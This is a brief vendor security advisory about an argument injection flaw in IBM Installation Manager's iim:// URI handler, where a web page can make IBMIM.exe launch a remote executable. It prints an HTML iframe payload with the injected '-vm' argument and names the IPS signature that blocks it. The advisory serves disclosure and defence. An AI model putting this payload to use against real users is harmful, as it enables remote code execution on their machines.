IBM Installation Manager Code Execution

IBM Installation Manager (IIM) is a software tool that helps to install, update, modify, and install packages. Additionally, IIM helps to keep track of what has been installed, determine what is available for installation, and organize installation directories. IIM runs on Windows and Linux platforms.

IIM provides a set of installation wizards to manage packages. When IIM is installed it registers the application "IBMIM.exe" as the iim:// scheme handler. The format for the scheme is listed bellow:

iim://URI

The aforementioned URI will be executed in the following command:

IBMIM.exe -url "URI"

IIM IBMIM.exe has many command line arguments such as -ignoreRepositoryDigest, -accessRights and so on. The following example shows a command that execute with multiple arguments:

IBMIM.exe -vm EXECUTABLE.EXE -url "www.google.com"

The above command can be invoked by the following HTML page:

< iframe src='iim://"%20-vm%20\x.x.x.xEXECUTABLE.EXE%20-url%20www.google.com"' >

There is an argument injection vulnerability in IBM Installation Manager. From the above example, we can see that a malicious executable file can be supplied as one of IBMIM.exe arguments with the iim:// scheme. A web browser may fail to sanitize the IIM URI before passing the URI to the registered application. An attacker exploiting this vulnerability can remotely control the arguments passed to the IIM executable, and inject/execute malicious programs.

SonicWALL has release an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature has been released:

• 2064 IBM Installation Manager iim URI Handling Code Execution Attempt

This vulnerability has not been assigned a Common Vulnerabilities and Exposures (CVE) identifier.